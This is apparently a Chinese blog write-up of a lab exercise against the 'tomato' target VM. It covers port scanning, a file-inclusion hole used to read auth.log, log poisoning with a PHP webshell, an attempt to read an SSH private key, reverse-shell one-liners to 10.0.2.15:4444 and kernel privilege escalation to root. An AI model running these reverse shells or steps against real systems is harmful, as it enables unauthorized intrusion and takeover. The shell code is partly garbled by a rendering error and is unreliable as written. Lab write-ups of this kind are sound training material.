靶机打靶过程及思路"/>
tomato靶机打靶过程及思路
1.常规端口及服务发现
2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径
3.发现info.php提示文件包含,读取到/var/log/auth.log ,可以用ssh登录传入一句话木马,
用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息
4.使用php语句进行反弹shell连接,php -r ‘KaTeX parse error: Expected 'EOF', got '&' at position 54: …"/bin/sh" -i <&̲3 >&3 2>&3);'也失…i=“10.0.2.15”; p = 4444 ; s o c k e t ( S , P F I N E T , S O C K S T R E A M , g e t p r o t o b y n a m e ( " t c p " ) ) ; i f ( c o n n e c t ( S , s o c k a d d r i n ( p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in( p=4444;socket(S,PFINET,SOCKSTREAM,getprotobyname("tcp"));if(connect(S,sockaddrin(p,inet_aton($i)))){open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);};’
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成
6.或者使用linux-exploit-suggester进行自动化枚举内核的提权漏洞,提权成功拿下shell
更多推荐
tomato靶机打靶过程及思路
发布评论